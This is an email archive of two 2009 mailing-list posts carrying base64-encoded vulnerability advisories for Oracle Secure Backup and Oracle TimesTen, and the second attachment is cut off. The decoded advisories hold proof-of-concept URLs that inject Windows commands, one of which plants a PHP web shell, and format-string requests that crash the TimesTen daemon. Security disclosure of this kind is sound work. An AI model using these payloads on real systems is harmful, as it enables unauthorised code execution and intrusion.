for <lists@securityspace.com>; Wed, 14 Jan 2009 17:00:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 027AE23724A; Wed, 14 Jan 2009 14:15:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11449 invoked from network); 14 Jan 2009 20:27:08 -0000
X-Yahoo-Newman-Id: 9498.29225.bm@omp208.mail.re3.yahoo.com
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.es;
  h=Received:X-YMail-OSG:X-Yahoo-Newman-Property:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
  b=lW5zytiYwQnadpqnwpoj1jKQf7dS3p253Y1JUv6TRwhsZYTZeLU4wNG3wp99NSjrjwuWnNin8assKXddYyn3tR9r/oAv8UhMML/Sgqc7TI5tw68ET3E+qe+5ddBPM5vhPRLPVX2X7M/iSJS1eCeVK7C66lfbfYPPPZ1FXAoN/s4=  ;
X-YMail-OSG: 3uQ85voVM1lDG42WbBNTS0P9qDS7C3pCGT6eX1w5gUvMBQ6bgushqTw7KoeYdFjDT4MG00ltYCejyaaky800bLC1ch_KZ5zTi.eNb_bp.eYrptBu2OienAPhH7KkxEI7LmqLqkAv35pqebd4JU7BCrWLwkGS6bZRjdQ9elMiZVdFvlmeRVs6kSobaA3nWpaZ7s7WR6FuDDssr.ulv94MRkpJUH8-
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle Secure Backup 10g Remote Code Execution
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-YhepHLVg9ODiz52nJhvx"
Date: Wed, 14 Jan 2009 21:51:47 +0100
Message-Id: <1231966307.18860.8.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-YhepHLVg9ODiz52nJhvx
Content-Type: multipart/mixed; boundary="=-khnqrW9NU0VZCuXuDSRv"


--=-khnqrW9NU0VZCuXuDSRv
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi,

Happy new year! Attached goes and advisory for one of the recently fixed
Oracle vulnerabilities in the product Oracle Secure Backup.

Regards,
Joxean Koret



--=-khnqrW9NU0VZCuXuDSRv
Content-Disposition: attachment; filename=oracle-secure-backup-2009-01-14.txt
Content-Type: text/plain; name=oracle-secure-backup-2009-01-14.txt; charset=UTF-8
Content-Transfer-Encoding: base64

T3JhY2xlIFNlY3VyZSBCYWNrdXAgMTBnIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbg0KPT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpQcm9kdWN0IERlc2NyaXB0
aW9uDQo9PT09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIGlzIGEgY2Vu
dHJhbGl6ZWQgdGFwZSBiYWNrdXAgbWFuYWdlbWVudCBzb2Z0d2FyZSBwcm92aWRpbmcNCnNlY3Vy
ZSBkYXRhIHByb3RlY3Rpb24gZm9yIGhldGVyb2dlbmVvdXMgZmlsZSBzeXN0ZW1zIGFuZCB0aGUg
T3JhY2xlIERhdGFiYXNlLg0KDQpTdW1tYXJ5DQo9PT09PT09DQoNClRoZSBPcmFjbGUgSmFudWFy
eSAyMDA5IENyaXRpY2FsIFBhdGNoIFVwZGF0ZSBmaXhlcyBhIHZ1bG5lcmFiaWxpdHkgd2hpY2gN
CmFsbG93cyBhIHJlbW90ZSBwcmVhdXRoZW50aWNhdGVkIGF0dGFja2VyIHRvIGV4ZWN1dGUgYXJi
aXRyYXJ5IGNvZGUgaW4gdGhlDQpjb250ZXh0IG9mIHRoZSB1c2VyIHJ1bm5pbmcgdGhlIHdlYiBz
ZXJ2ZXIgb2YgT3JhY2xlIFNlY3VyZSBCYWNrdXAuDQoNCkluIFdpbmRvd3MgZW52aXJvbm1lbnRz
LCB0aGUgdnVsbmVyYWJpbGl0eSBhbGxvd3MgZXhlY3V0aW9uIG9mIGFyYml0cmFyeSBjb2RlIGFz
DQpTWVNURU0uIEluIFVuaXggYW5kIEdOVS9MaW51eCBlbnZpcm9ubWVudHMsIGhvd2V2ZXIsIGp1
c3QgYXMgYSBub3JtYWwgdXNlcg0KKG9yYWNsZSB1c3VhbGx5KS4NCg0KQ1ZTUzIgUmlzayBTY29y
ZQ0KPT09PT09PT09PT09PT09PQ0KDQpNaWNyb3NvZnQgV2luZG93czogMTANCkxpbnV4IGFuZCBV
bml4ICAgOiAgNyw1DQoNCkFmZmVjdGVkIHZlcnNpb25zDQo9PT09PT09PT09PT09PT09PQ0KDQpP
cmFjbGUgU2VjdXJlIEJhY2t1cCB2ZXJzaW9uIDEwLjEuMC4zIHRvIDEwLjIuMC4yIGluIGFsbCBz
dXBwb3J0ZWQgb3BlcmF0aW5nIHN5c3RlbXMNCmFyZSBhZmZlY3RlZC4NCg0KVnVsbmVyYWJpbGl0
eSBEZXRhaWxzDQo9PT09PT09PT09PT09PT09PT09PT0NCg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAg
Y29tZXMgd2l0aCBvbmUgUEhQIGJhc2VkIGZyb250ZW5kIHdoaWNoIGlzIHZ1bG5lcmFibGUgdG8g
YQ0KdmFyaWFibGUgcG9pc29uaW5nIGF0dGFjayByZWdhcmRsZXNzIGlmIHRoZSBQSFAgZGlyZWN0
aXZlIHJlZ2lzdGVyX2dsb2JhbHMgaXMgDQplbmFibGVkIG9yIG5vdC4NCg0KSW50ZXJuYWxseSwg
YWxsIHRoZSB2YXJpYWJsZXMgcGFzc2VkIHRvIHRoZSBzY3JpcHQgbG9naW4ucGhwIGFyZSBjb252
ZXJ0ZWQgdG8gZ2xvYmFsDQp2YXJpYWJsZXMgaW4gdGhlIGZpbGUgJFJPT1RccGhwXGdsb2JhbHMu
cGhwLiBBbnkgdmFyaWFibGUgcmVnYXJkaW5nIG9yIHJlZ2FyZGxlc3MgdGhlDQptZXRob2QgdXNl
ZCB0byBzZW5kIHRoZSBxdWVyeSB3aWxsIGJlIHJlZ2lzdGVyZWQgYXMgYSBnbG9iYWwgdmFyaWFi
bGUuDQoNCkZyb20gdGhlIGxvZ2luIHNjcmlwdCBjYWxsZWQgImxvZ2luLnBocCIgdGhlIHRvb2wg
Im9idC5leGUiIGlzIGV4ZWN1dGVkIHdpdGggYSBwb3Blbg0KY2FsbCBwYXNzaW5nIGFyZ3VtZW50
cyByZWNlaXZlZCBmcm9tIHRoZSBjbGllbnQuIFRoZXNlIGFyZ3VtZW50cyBhcmUgbm90IHNhbml0
aXplZA0Kbm9yIHZlcmlmaWVkIGFuZCBpdCBhbGxvd3MgcG9zdC1hdXRoZW50aWNhdGlvbiByZW1v
dGUgY29tbWFuZCBleGVjdXRpb24gQlVUIGR1ZSB0byBhDQpsb2dpYyBmYWlsdXJlIGluIHRoZSBz
Y3JpcHQgImxvZ2luLnBocCIgd2hlbiB0aGUgdmFyaWFibGUgImNsZWFyIiBoYXMgdGhlIHZhbHVl
ICJubyINCmFuZCBvdGhlciB2YXJpYWJsZXMgKHRoYXQgc3VwcG9zZWRseSBjb21lcyBmcm9tIGEg
Y29va2llKSBhcmUgc2V0IGFueW9uZSBjYW4gZXhlY3V0ZQ0Kb3BlcmF0aW5nIHN5c3RlbSBjb21t
YW5kIGZyb20gcmVtb3RlIHdpdGhvdXQgYmVpbmcgYXV0aGVudGljYXRlZC4gVGhlIHZ1bG5lcmFi
bGUgY29kZQ0KaXMgdGhlIGZvbGxvd2luZzoNCg0KKC4uLikNCiAgICBpZiAoc3RybGVuKCRvcmFf
b3NiX2JnY29va2llKSA+IDAgJiYgJGJ1dHRvbiA9PSAiTG9nb3V0IikNCiAgICAgIHsNCiAgICAg
IC8vIFR1cm4gREVCVUdfRVhFQyB0byBvZmYNCiAgICAgICR0bXAgPSAkREVCVUdfRVhFQzsNCiAg
ICAgICRERUJVR19FWEVDID0gIm5vIjsNCg0KICAgICAgLy8gVGVtaW5hdGUgdGhlIGNvbm5lY3Rp
b24uDQogICAgICAkcXJfY29tbWFuZCA9ICIkcmJ0b29sIC0tdGVybWluYXRlICRvcmFfb3NiX2Jn
Y29va2llLSRvcmFfb3NiX2xjb29raWUiOw0KICAgICAgJG1zZyA9IGV4ZWNfcXIoIiRxcl9jb21t
YW5kIik7DQoNCiAgICAgIGlmIChzdHJuY21wKCRtc2dbMF0sICJFcnJvcjoiLCA2KSkNCiAgICAg
ICAgew0KICAgICAgICAvLyBTZXQgdGhlIGNvb2tpZSB1cC4NCiAgICAgICAgc2V0Y29va2llKCJv
cmFfb3NiX2JnY29va2llIiwgIiIpOw0KICAgICAgICBzZXRjb29raWUoIm9yYV9vc2JfbGNvb2tp
ZSIsICIiKTsNCiAgICAgICAgJG9yYV9vc2JfYmdjb29raWUgPSAiIjsNCiAgICAgICAgfQ0KDQog
ICAgICAvLyBSZXNldCBERUJVR19FWEVDLg0KICAgICAgJERFQlVHX0VYRUMgPSAkZHRtcDsNCiAg
ICAgIH0NCiAgICBoZWFkZXIoIkxvY2F0aW9uOiAvbG9naW4ucGhwP2NsZWFyPXllcyIpOw0KICAg
IH0NCiguLi4pDQoNClRoZSBmdW5jdGlvbiAiZXhlY19xciIgaW50ZXJuYWxseSBjYWxscyB0aGUg
ZnVuY3Rpb24gUEhQIGZ1bmN0aW9uICJwb3BlbiIgdG8gZXhlY3V0ZQ0KYSBjb21tYW5kLiBUaGUg
JHJidG9vbCB2YXJpYWJsZSwgYWJ1c2luZyBmcm9tIHRoZSB2YXJpYWJsZSBwb2lzb25pbmcgYXR0
YWNrLCBjYW4gYmUNCmNoYW5nZWQgdG8sIGluIGV4YW1wbGUsIC9iaW4vc2ggb3IgY21kLmV4ZSB0
byBleGVjdXRlIGFyYml0cmFyeSBjb21tYW5kcyB3aXRob3V0IHRoZQ0KbmVlZCBmb3IgYSB1c2Vy
IG5hbWUgb3IgcGFzc3dvcmQsIGp1c3Qgd2l0aCBuZXR3b3JrIGFjY2VzcyB0byB0aGUgT3JhY2xl
IFNlY3VyZSBCYWNrdXANCldlYiBzZXJ2ZXIuIEluIGZhY3QsIHRoZSBzY3JpcHQgdGhpbmtzIHRo
YXQgd2UncmUgZG9pbmcgYSBsb2dvdXQuDQoNClByb29mIG9mIENvbmNlcHQNCj09PT09PT09PT09
PT09PT0NCg0KKiBDcmVhdGUgYSBmaWxlIGluIHRoZSBkaXJlY3RvcnkgImM6XCINCg0KaHR0cHM6
Ly88dGFyZ2V0Pi9sb2dpbi5waHA/Y2xlYXI9bm8mb3JhX29zYl9sY29va2llPWFhJm9yYV9vc2Jf
Ymdjb29raWU9YmImYnV0dG9uPUxvZ291dCZyYnRvb2w9Y21kLmV4ZSsvYytlY2hvK2hlbGxvK3dv
cmxkKyUzRStjOlxvcmFjbGUuc2VjdXJlLmJhY2t1cC50eHQrOw0KDQoqIENyZWF0ZSBhIFBIUCBi
YWNrZG9vcg0KDQpodHRwczovLzx0YXJnZXQ+L2xvZ2luLnBocD9jbGVhcj1ubyZvcmFfb3NiX2xj
b29raWU9YWEmb3JhX29zYl9iZ2Nvb2tpZT1iYiZidXR0b249TG9nb3V0JnJidG9vbD1jbWQuZXhl
Ky9jK2VjaG8rJTIyJTNDJTNGcGhwK3ByaW50KHNoZWxsX2V4ZWMoJTI0X0dFVCU1QidhJyU1RCkp
JTNCKyUzRiUzRSUyMislM0UrdGVzdC5waHAlM0IlMjYlMjYrZWNobw0KDQpXb3JrYXJvdW5kDQo9
PT09PT09PT09DQoNCkRpc2FibGUgdGhlIHdlYiBzZXJ2ZXIuDQoNClBhdGNoIGluZm9ybWF0aW9u
DQo9PT09PT09PT09PT09PT09PQ0KDQpPcmFjbGUgZml4ZWQgdGhlIHZ1bG5lcmFiaWxpdHkgaW4g
dmVyc2lvbiAxMC4yLjAuMyBvZiBPcmFjbGUgU2VjdXJlIEJhY2t1cC4NCg0KQ29udGFjdCBJbmZv
cm1hdGlvbg0KPT09PT09PT09PT09PT09PT09PQ0KDQpUaGUgdnVsbmVyYWJpbGl0eSB3YXMgZm91
bmQgYnkgSm94ZWFuIEtvcmV0LCBhZG1pblthdF1qb3hlYW5rb3JldFtkb3RdY29tDQoNClJlZmVy
ZW5jZXMNCj09PT09PT09PT0NCg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAgZXhlY19xcigpIENvbW1h
bmQgSW5qZWN0aW9uIFZ1bG5lcmFiaWxpdHk6DQpodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZl
LmNvbS9hZHZpc29yaWVzL1pESS0wOS0wMDMvDQoNCk9yYWNsZSBDcml0aWNhbCBQYXRjaCBVcGRh
dGUgSmFudWFyeSAyMDA5Og0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95
L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sDQoNClBlcm1h
bmVudCBWZXJzaW9uIG9mIHRoZSBhZHZpc29yeToNCmh0dHA6Ly9qb3hlYW5rb3JldC5jb20vYmxv
Zy8/cD0zOQ0KDQpQcm9mZXNzaW9uYWwgV2ViOg0KaHR0cDovL3d3dy5qb3hlYW5rb3JldC5jb20N
Cg0KUGVyc29uYWwgQmxvZzoNCmh0dHA6Ly93d3cuam94ZWFua29yZXQuY29tL2Jsb2cNCg0KRGlz
Y2xhaW1lcg0KPT09PT09PT09PQ0KDQpUaGUgaW5mb3JtYXRpb24gaW4gdGhpcyBhZHZpc29yeSBh
bmQgYW55IG9mIGl0cyBkZW1vbnN0cmF0aW9ucyBpcyBwcm92aWRlZCAiYXMgaXMiDQp3aXRob3V0
IGFueSB3YXJyYW50eSBvZiBhbnkga2luZC4NCg0KSSBhbSBub3QgbGlhYmxlIGZvciBhbnkgZGly
ZWN0IG9yIGluZGlyZWN0IGRhbWFnZXMgY2F1c2VkIGFzIGEgcmVzdWx0IG9mIHVzaW5nIHRoZQ0K
aW5mb3JtYXRpb24gb3IgZGVtb25zdHJhdGlvbnMgcHJvdmlkZWQgaW4gYW55IHBhcnQgb2YgdGhp
cyBhZHZpc29yeS4NCg0K


--=-khnqrW9NU0VZCuXuDSRv--

--=-YhepHLVg9ODiz52nJhvx
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblBjU6rFMEYDrlERAhy3AJ4+eNpeftbfS0Im+TaEwSiJA3GTBgCfSohG
h1dFPwTx7ucfiIqE2iHmicA=iqhK
-----END PGP SIGNATURE-----

--=-YhepHLVg9ODiz52nJhvx--



______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y msviles desde 1 cintimo por minuto. 
http://es.voice.yahoo.com

From - Wed Jan 14 17:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058eb
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39183-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 955A5EC9C2
for <lists@securityspace.com>; Wed, 14 Jan 2009 17:10:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8DC1D2372AC; Wed, 14 Jan 2009 14:16:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11509 invoked from network); 14 Jan 2009 20:28:27 -0000
X-Yahoo-Newman-Id: 829902.63290.bm@omp203.mail.re3.yahoo.com
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.es;
  h=Received:X-YMail-OSG:X-Yahoo-Newman-Property:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
  b=Pyj2ZlktCe3qtYA7ZkcfMd0o+klkdOMI5guiOGpFxU61aSP+lLvg7kdf+MW/nvbhWoHf5ukcsLk9uz33r9h7FhOznFpvx9Yrwcb8NTDBB2k8WH4UTZPRMVqYX7nu4LkuNZ6LZMHBdLM7UPoKlrNxOmZDwQGh9EUWKbR7tWM7KhM=  ;
X-YMail-OSG: YV7eL24VM1l1h1c2phK8t3h8ChD5b4_Sefv.H5zs_1itsG7TOxyepTS8CzHyUzN_snAqlO9OQyAqcE1S9.gjRwqw.AFWPZLByxD.MHxGVT4IzSkrwx1NgOqemjsTl_arPT.wMegOUFMNXcyeXib0nhoJw9FgmCGSDxSlVrms6a8fVhHEiZJSneptNQJxaPWrXp7XGIoy5foU8JikiMMs.NYjIKA-
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle TimesTen Remote Format String
From: Joxean Koret <joxeankoret@yahoo.es>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-FHE+nIKLYvfBYNKSgYeb"
Date: Wed, 14 Jan 2009 21:53:05 +0100
Message-Id: <1231966385.18860.11.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: multipart/mixed; boundary="=-Y1d5wnjF15zP9y7LtuBL"


--=-Y1d5wnjF15zP9y7LtuBL
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi again,

Attached goes and advisory for the unique vulnerability in Oracle
TimesTen fixed in the Oracle Critical Patch Update January 2009.

Cheers!
Joxean Koret



--=-Y1d5wnjF15zP9y7LtuBL
Content-Disposition: attachment; filename=oracle-times-ten-2009-01-14.txt
Content-Transfer-Encoding: base64
Content-Type: text/plain; name=oracle-times-ten-2009-01-14.txt; charset=UTF-8

T3JhY2xlIFRpbWVzVGVuIFJlbW90ZSBGb3JtYXQgU3RyaW5nDQo9PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT0NCg0KUHJvZHVjdCBEZXNjcmlwdGlvbg0KPT09PT09PT09PT09PT09
PT09PQ0KDQpPcmFjbGUgVGltZXNUZW4gcHJvdmlkZXMgYSBmYW1pbHkgb2YgcmVhbC10aW1lIGlu
ZnJhc3RydWN0dXJlIHNvZnR3YXJlIHByb2R1Y3RzDQpkZXNpZ25lZCBmb3IgbG93IGxhdGVuY3ks
IGhpZ2gtdm9sdW1lIGRhdGEsIGV2ZW50IGFuZCB0cmFuc2FjdGlvbiBtYW5hZ2VtZW50Lg0KDQpT
dW1tYXJ5DQo9PT09PT09DQoNClRoZSBPcmFjbGUgSmFudWFyeSAyMDA5IENyaXRpY2FsIFBhdGNo
IFVwZGF0ZSBmaXhlcyBhIHZ1bG5lcmFiaWxpdHkgd2hpY2gNCmFsbG93cyBhIHJlbW90ZSBwcmVh
dXRoZW50aWNhdGVkIGF0dGFja2VyIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgaW4gdGhlDQpj
b250ZXh0IG9mIHRoZSB1c2VyIHJ1bm5pbmcgT3JhY2xlIFRpbWVzVGVuIHNlcnZlci4NCg0KQWZm
ZWN0ZWQgdmVyc2lvbnMNCj09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBUaW1lc1RlbiBwcmlv
ciB0byB2ZXJzaW9uIDcuMC41LjEuMC4NCg0KDQpWdWxuZXJhYmlsaXR5DQo9PT09PT09PT09PT09
DQoNCk9yYWNsZSBUaW1lc1RlbidzIHRpbWVzdGVuZCBkYWVtb24gaXMgYSBzaW1wbGUgd2ViIHNl
cnZlciB0aGF0IHByb2Nlc3MgdGhlDQpjb21tYW5kcyByZWNlaXZlZCBmcm9tIGNsaWVudHMuIE1h
bnkgb2YgdGhlc2UgY29tbWFuZHMgYXJlIHVzZWQgd2l0aG91dA0KYmVpbmcgYXV0aGVudGljYXRl
ZCwgaS5lLiwgd2l0aG91dCB0aGUgbmVlZCBmb3IgYSB1c2VybmFtZSBhbmQgcGFzc3dvcmQuIA0K
DQpUaGUgY29tbWFuZCAiZXZ0ZHVtcCIgZHVtcHMgdG8gdGhlIGludGVybmFsIGxvZyBmaWxlIHRo
ZSBjb250ZW50cyBvZiBhbg0KaW50ZXJuYWwgZGF0YSBzdHJ1Y3R1cmUuIFRoZSBwc2V1ZG8tY2dp
IGV2dGR1bXAgb25seSByZWNlaXZlcyBvbmUgcGFyYW1ldGVyLA0KY2FsbGVkIG1zZy4gVGhlIHBh
cmFtZXRlciAibXNnIiBpcyBhIHRleHQgdGhhdCB3aWxsIGJlIHByaW50ZWQgdG8gdGhlIGxvZw0K
ZmlsZSBiZWZvcmUgZHVtcGluZyB0aGUgaW50ZXJuYWwgc3RydWN0dXJlLg0KDQpUaGlzIHBhcmFt
ZXRlciBpcyB2dWxuZXJhYmxlIHRvIGEgZm9ybWF0IHN0cmluZyBhdHRhY2sgd2hpY2ggbGVhZHMg
dG8gcmVtb3RlDQpjb2RlIGV4ZWN1dGlvbiBiZWZvcmUgYmVpbmcgYXV0aGVudGljYXRlZC4gVGhl
IHZ1bG5lcmFiaWxpdHkgaGF2ZSBiZWVuIHRlc3RlZA0KaW4gTGludXggZW52aXJvbm1lbnRzLCBh
bHRob3VnaCBpdCBhcHBlYXJzIHRvIGJlIHZ1bG5lcmFibGUgaW4gYWxsIHRoZQ0Kc3VwcG9ydGVk
IHBsYXRmb3Jtcy4NCg0KVGhlIGZvbGxvd2luZyBpcyBhbiBleHRyYWN0IG9mIGEgY29tbXVuaWNh
dGlvbiBiZXR3ZWVuIGEgY3VzdG9tIGNsaWVudCBhbmQgDQp0aGUgdGltZXN0ZW5kIGRhZW1vbiAo
dGhlIG91dHB1dCBmcm9tIHRoZSBzZXJ2ZXIgaXMgc2hvd24gaW4gdGhlIGZpbGUgDQovdmFyL1Rp
bWVzVGVuL2xvZy90dG1lc2cubG9nIGluIFVuaXggYW5kIEdOVS9MaW51eCBlbnZpcm9ubWVudHMp
OiANCg0KRlJPTSBDTElFTlQ6DQoNCkdFVCBldnRkdW1wP21zZz1BQUFBJTI1MTAkeCUyNXMgSFRU
UC8xLjBcclxuXHJcbg0KDQpBVCBTRVJWRVI6DQoNCiguLi4pDQojIGNhdCAvdmFyL1RpbWVzVGVu
L2xvZy90dG1lc2cubG9nDQooLi4uKQ0KMTk6MDU6MDcuMDEgSW5mbzogICAgOiAxODIyNTogbWFp
bmQgMjI6IHNvY2tldCBjbG9zZWQsIGNhbGxpbmcgcmVjb3ZlcnkgKGxhc3QgY21kIHdhcyAyNSkN
CjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IEFBQUE4MGE4YTBjKG51bGwpDQoxOTowNTox
OS4wNyBJbmZvOiAgICA6IDE4MjI1OiBtb2RlICAgICA6ICBUVERMX05PUk1BTA0KMTk6MDU6MTku
MDcgSW5mbzogICAgOiAxODIyNTogY3RsZmlsZW5hbWUgOiAgJycNCjE5OjA1OjE5LjA3IEluZm86
ICAgIDogMTgyMjU6IGxpbmVubyAgIDogIDANCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6
IG5pdGVtcyAgIDogIDcNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IG1heGl0ZW1zIDog
IDMyDQoxOTowNToxOS4wNyBJbmZvOiAgICA6IDE4MjI1OiBjdXJfcGF0aCA6ICAobnVsbCkNCjE5
OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IGxpbmVubyAgIDogIDANCjE5OjA1OjE5LjA3IElu
Zm86ICAgIDogMTgyMjU6IGl0ZW1zICAgIDoNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6
ICAgaXRlbSAjIDAgIDoNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6ICAgICBjb21wICAg
ICA6IEFMTA0KMTk6MDU6MTkuMDcgSW5mbzogICAgOiAxODIyNTogICAgIGxldmVsICAgIDogMw0K
MTk6MDU6MTkuMDcgSW5mbzogICAgOiAxODIyNTogICAgIGRzbmFtZSAgIDogKG51bGwpDQooLi4u
KQ0KDQpGUk9NIENMSUVOVDoNCg0KR0VUIGV2dGR1bXA/bXNnPUFBQUElMjUxMCR4JTI1cyUyNXMl
MjVzIEhUVFAvMS4wDQoNCkFUIFNFUlZFUjoNCg0KKC4uLikNCiMgY2F0IC92YXIvVGltZXNUZW4v
bG9nL3R0bWVzZy5sb2cNCjE5OjA1OjE5LjA4IEluZm86ICAgIDogMTgyMjU6IG1haW5kIDIzOiBz
b2NrZXQgY2xvc2VkLCBjYWxsaW5nIHJlY292ZXJ5IChsYXN0IGNtZCB3YXMgMjYpDQoxOTowNjox
OC40OSBJbmZvOiAgICA6IDE4MjI1OiBBQUFBODBhOGEwYyhudWxsKShudWxsKQ0KMTk6MDY6MTgu
NDkgSW5mbzogICAgOiAxODIyNTogbW9kZSAgICAgOiAgVFRETF9OT1JNQUwNCjE5OjA2OjE4LjQ5
IEluZm86ICAgIDogMTgyMjU6IGN0bGZpbGVuYW1lIDogICcnDQoxOTowNjoxOC40OSBJbmZvOiAg
ICA6IDE4MjI1OiBsaW5lbm8gICA6ICAwDQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBu
aXRlbXMgICA6ICA3DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBtYXhpdGVtcyA6ICAz
Mg0KMTk6MDY6MTguNDkgSW5mbzogICAgOiAxODIyNTogY3VyX3BhdGggOiAgKG51bGwpDQoxOTow
NjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBsaW5lbm8gICA6ICAwDQoxOTowNjoxOC40OSBJbmZv
OiAgICA6IDE4MjI1OiBpdGVtcyAgICA6DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiAg
IGl0ZW0gIyAwICA6DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiAgICAgY29tcCAgICAg
OiBBTEwNCjE5OjA2OjE4LjQ5IEluZm86ICAgIDogMTgyMjU6ICAgICBsZXZlbCAgICA6IDMNCjE5
OjA2OjE4LjQ5IEluZm86ICAgIDogMTgyMjU6ICAgICBkc25hbWUgICA6IChudWxsKQ0KKC4uLikN
Cg0KRlJPTSBDTElFTlQ6DQoNCkdFVCBldnRkdW1wP21zZz1BQUFBJTI1biBIVFRQLzEuMA0KDQpB
VCBTRVJWRVI6DQoNCiguLi4pDQojIGNhdCAvdmFyL1RpbWVzVGVuL2xvZy90dG1lc2cubG9nDQox
OTowNzozOC44NyBFcnIgOiAgICA6IDE4NzgyOiBUVDE0MDAwOiBUaW1lc1RlbiBkYWVtb24gaW50
ZXJuYWwgZXJyb3I6IHN1YmQ6IE1haW4gZGFlbW9uIGhhcyB2YW5pc2hlZA0KMTk6MDc6MzguODcg
RXJyIDogICAgOiAxODc4NTogVFQxNDAwMDogVGltZXNUZW4gZGFlbW9uIGludGVybmFsIGVycm9y
OiBzdWJkOiBNYWluIGRhZW1vbiBoYXMgdmFuaXNoZWQNCjE5OjA3OjM4Ljg3IEVyciA6ICAgIDog
MTg3ODg6IFRUMTQwMDA6IFRpbWVzVGVuIGRhZW1vbiBpbnRlcm5hbCBlcnJvcjogc3ViZDogTWFp
biBkYWVtb24gaGFzIHZhbmlzaGVkDQoxOTowNzozOC44NyBFcnIgOiAgICA6IDE4NzkxOiBUVDE0
MDAwOiBUaW1lc1RlbiBkYWVtb24gaW50ZXJuYWwgZXJyb3I6IHN1YmQ6IE1haW4gZGFlbW9uIGhh
cyB2YW5pc2hlZA0KMTk6MDc6MzguODcgSW5mbzogU1JWOiAxODgwMDogRXZlbnRJRD05OXwgVGlt
ZXNUZW4gZGFlbW9uIGhhcyBkaXNjb25uZWN0ZWQsIHNlcnZlciBpcyBleGl0aW5nLi4uDQoxOTow
NzozOS41NCBJbmZvOiAgICA6IDE4Nzg1OiBMaXN0ZW5lciB0ZXJtaW5hdGluZw0KMTk6MDc6Mzku
NTQgSW5mbzogICAgOiAxODc4NTogTGlzdGVuZXIgZXhpdGVkLCB0ZXJtaW5hdGlvbiBmaW5pc2hp
bmcNCjE5OjA3OjM5LjU0IEluZm86ICAgIDogMTg3ODU6IFByb2Nlc3MgdGVybWluYXRpb24gY29t
cGxldGUNCjE5OjA3OjM5LjU5IEluZm86ICAgIDogMTg3OTE6IExpc3RlbmVyIHRlcm1pbmF0aW5n
DQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzgyOiBMaXN0ZW5lciB0ZXJtaW5hdGluZw0KMTk6
